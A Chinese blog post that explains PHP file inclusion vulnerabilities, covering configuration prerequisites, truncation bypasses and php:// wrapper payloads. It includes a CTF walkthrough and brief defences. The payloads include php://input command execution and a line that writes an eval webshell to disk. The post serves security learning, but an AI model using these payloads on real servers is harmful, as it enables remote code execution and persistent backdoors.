文件操作之文件包含解析

最新推荐文章于 2022-12-13 16:04:49 发布
最新推荐文章于 2022-12-13 16:04:49 发布
阅读量265 收藏
点赞数
分类专栏: 漏洞学习 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/119386980
版权

0x00 漏洞产生原因

文件包含解析漏洞,往往会造成网站的信息泄露,执行命令等,原因是因为在网站中间件的配置文件例如php.ini里面的函数造成,漏洞的存在要保证一下两个函数处于开启状态

allow_url_fopen = On:
通俗来讲,allow_url_fopen函数是允许http://和ftp://将url中当作文件处理,

allow_url_include = Off:
allow_url_include是允许include/require打开URL也将其组为文件处理,

include函数:
Include()函数可以获取指定的文件中的所有文本,并把文本拷贝到使用include()函数的文件中。当包含遇到错误,如包含文件不存在时,include()函数会生成警告,但是脚本继续执行。

require函数:
Require()函数同样接受所有的文本文件,并且也将文件复制到使用函数的文件中,但是当此函数遇到错误时,如被包含文件不存在,require()函数会爆出错误,并且脚本停止执行。

文件包含的分类: 本地包含:127.0.0.1/?filename=…/…/…/1.txt (当作php执行) 远程包含:危害更大:127.0.0.1/?filename=http://www.xxx.com/1.txt)

简单绕过: %00截断:条件:magic_quotes_gpc = Off php版本<5.3.4 filename=…/…/…/www.txt%00 长度截断:条件:windows,点号需要长于256;linux 长于4096
http://127.0.0.1:8080/include.php?filename=http://www.kxsy.work/readme.txt
http://127.0.0.1:8080/include.php?filename=http://www.kxsy.work/readme.txt%20 http://127.0.0.1:8080/include.php?filename=http://www.kxsy.work/readme.txt%23 http://127.0.0.1:8080/include.php?filename=http://www.kxsy.work/readme.txt?

0x01 文件包含解析漏洞-百度杯-CTF案例

> 首先介绍文件包含协议流玩法:

> #https://www.cnblogs.com/endust/p/11804767.html http://127.0.0.1:8080/include.php?filename=php://filter/convert.base64-encode/resource=1.txt
> http://127.0.0.1:8080/include.php?filename=php://input Post:<?php system('ver')?> 
> <?PHP fputs(fopen('s.php','w'),'<?php @eval($_POST[cmd])?>');?>
> http://127.0.0.1:8080/include.php?filename=file:///D:/phpstudy/PHPTutorial/WWW/1.txt
> http://127.0.0.1:8080/include.php?filename=data://text/plain,<?php%20phpinfo();?>

题目页面:
页面
发现path传参,通过get传参不行,需要以post方式传参,这里利用上面协议流filename=php://input Post:<?php system('ls')?> 漏洞尝试 发现可疑文件
可疑文件
利用漏洞读取函数获取flag
发现flag

0x02 漏洞防范

1.固定后缀
2.固定文件
3.部署WAF产品

告白热
关注
专栏目录
文件包含解析
qq_64332865的博客
02-28 317
实验原理 1.文件包含函数加载的参数没有经过过滤或者严格定义,可以被用户控制,包含了其他恶意文件,导致执行了非预期的代码。分类:本地文件包含和远程文件包含。 2.可利用途径:读取敏感信息、远程包含shell、本地包含配合文件上传; 3.php协议 1,本地文件包含(无视后缀) 创建一个index.php文件, 然后再创建一个1.txt,文件内容为 然后尝试文件包含访问 可以显示出来,然后可以尝试更换文件后缀名,在进行尝试 后缀名更换为jpg也可以显示出来,在继续更换为ph...
web安全--文件包含实例操作
u010625568的博客
06-29 457
文件包含分为LFI(本地文件包含)和RFL(远程文件包含)两种。文件包含的前提是服务器allow_url_openllow_url_include(LFI)或者allow_url_open(RFI)。在owasp环境中可以在/etc/php5/cli/php/ini查看。 同样进入owasp靶机的DVWA 1. 选择进入安全级别为low 2.进入file inclusion查看后端源码,该页面包含了一个include.php,可以尝试将本页面的链接http://192.168.3.94/dvwa/vu
bugku题解-文件包含
qq_51775369的博客
10-15 1039
访问目标地址 发现有一个链接,点击,发现跳转到/index.php?file=show.php 之后就想到文件包含可以使用PHP协议php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 在url后改为?file=php://filter/read=convert.base64-encode/resource=index.php发现显示了base64编码的字符串...
文件包含漏洞
sunxingstar的博客
08-24 1966
主要包括本地文件包含LFI和远程文件包含RFI 两种形式。 文件包含攻击可能存在于WEB服务器源码里的inlcude()此类文件包含操作函数附近,通过客户端构造提交文件路径,是该 漏洞攻击成功的最主要原因。 常见的导致文件包含的函数  php: include(), include_once(), require(), require_once(), fopen(), readfile()… ...
java解析上传的shp文件,包含jar,方法,shp文件
07-21
在Java编程环境中,解析Shapefile(.shp)文件是一项常见的任务,特别是在地理信息系统(GIS)应用中。Shapefile是一种广泛用于存储地理空间数据的开放格式。为了在Java中处理这些文件,我们可以利用开源库GeoTools...
C#做的一个窗体解析DBC文件.rar_C# DBC frame_C# DBC文件解析_C# 解析DBC软件_DBC解析_c#解
07-14
在C#中解析DBC文件,通常需要理解DBC文件的格式规范,包括节点(Node)、消息(Message/Frame)、信号(Signal)等概念。节点代表了网络中的硬件设备,消息则包含了多个信号,每个信号表示特定的物理量或控制信息。C#程序...
HEX文件Labview解析_hex_hex解析_hex解析_hex文件和labview_bodyvmj_
10-02
这篇文档将详细讨论HEX文件的基本概念、LabVIEW中的HEX文件解析以及如何利用提供的`HEX文件Labview解析.vi`来实现这一功能。 1. **HEX文件格式**: - HEX文件是一种ASCII文本文件,它以十六进制格式记录二进制数据...
基于C#开发的STEP文件解析器完整源码+项目说明(毕设项目).zip
01-28
基于C#开发的STEP文件解析器完整源码+项目说明(毕设项目).zip 【资源介绍】 此项目是本人的毕业设计的研究课题,旨在实现一个STEP解析器,预期功能如下: 解析STEP文件,识别出各组成元素的类型、详细信息,以及元素...
基于Python的FLV文件解析操作和索引库设计源码
最新发布
10-02
该项目是一个基于Python的FLV文件解析操作和索引库设计源码,包含36个文件,主要包含17个Python文件。该库旨在提供对FLV文件全面处理的功能,支持文件解析、编辑和索引,适用于需要处理FLV文件的应用场景。
BugKuCTF套路满满的题--------文件包含2
qq_42133828的博客
12-24 1723
首先讲一下这道题的思路,文件包含,什么是文件包含?其实简单来说就是通过一个文件传入参数(构造语句)去访问另一个文件,从而得到你所想要的东西。 然而,这道题,除了文件包含的知识。还涉及到了文件上传的知识。毕竟,这两者总是相互存在在。。。。。 好了,接下来,开始解题: 首先进入的界面是一个欢迎界面,看URL里的参数得有一个参数file,查看源码可得有upload.php这个文件存在,那么改一下f...
文件包含漏洞原理与实践练习题
weixin_54217081的博客
12-13 905
一.多选 1.下列属于文件包含函数的是( ABCD ) A.include B.include_once C.require D.require_once 二.判断 1.文件包含漏洞在PHP中比较多,其他语言中不存在。( × ) 2.文件包含漏洞在利用时无视后缀名,任何扩展名都可以被PHP解析。( √ )
配置文件填写内网地址和127.0.0.1的区别
qq_42582773的博客
03-29 1441
今天,在部署项目时,在Java的yml配置文件中数据库mysql连接地址编写内网地址,然后运行就报错误如下: java.sql.SQLException: null, message from server: "Host 'phs-others' is not allowed to connect to this MySQL server" 然而,我将yml配置文件中相关网络地址改为127.0.0.1,然后就成功运行了。这时候,我们就要去思考这是因为什么呢 内网地址和本机地址连接mysql区别 当使
Linux:/etc/hosts中的127.0.0.1作用
weixin_30332241的博客
01-28 831
摘:http://cicikasa.blog.163.com/blog/static/137575355201021992145582/ /etc/hosts中必然有一行为127.0.0.1,作用是什么呢? 特点: (1)127.0.0.1不光是unix系统,linux也好,windows也好,都会有这个循回地址的。(2)在IP地址的规定中,第一部分是1~126为A类地址,128~191为B...
关于upload-labs实验pass-11的00截断报上传出错的解决办法
m0_47505062的博客
03-02 1956
今天在做实验upload-labs 的pass-11, 用%00做00截断,结果没有效果,burp suite 报错:提示:上传出错! 经过两处修改,问题解决,实验成功 1、修改php为 5.2.17版本, 2、修改phpphp.ini文件,将 参数 magic_quotes_gpc 置 off 问题解决,是拜托了2位前辈的文章, READER-L 前辈的文章中提到实验成功需要2个必要条件, 移移 从前辈的文章中,能读出“magic_quotes_gpc” 可能与 php.ini文件有关,
57. 文件包含篇——文件包含漏洞原理解析
Fly_鹏程万里
03-22 1095
定义:在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无须再次编写,这种调用文件的过程一般被称为包含。程序开发人员都希望代码更加灵活,所以通常会将被包含的文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调...
攻防世界CTF —— PHP本地文件包含漏洞解题思路
weixin_47610939的博客
07-27 4267
攻防世界的CTF web类题目,关于php本地文件包含漏洞的解题思路
文件包含练习1
qq_61109509的博客
02-07 1085
大佬文章
未能解析文件..\EF.Utility.CS.ttinclude的包含文本
weixin_44010491的博客
03-07 1192
未能解析文件..\EF.Utility.CS.ttinclude的包含文本在vs2013使用EF的DatabaseFirst从数据库导出到Model的时候报2个错误。主要是由“未能解析文件..\EF.Utility.CS.ttinclude的包含文本”这个错误引起的。尝试了各种更新、重装EntityFramework等、修复VS2013重启电脑等,均无效,最后更新了vs2013。通了,手动笑脸。功...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值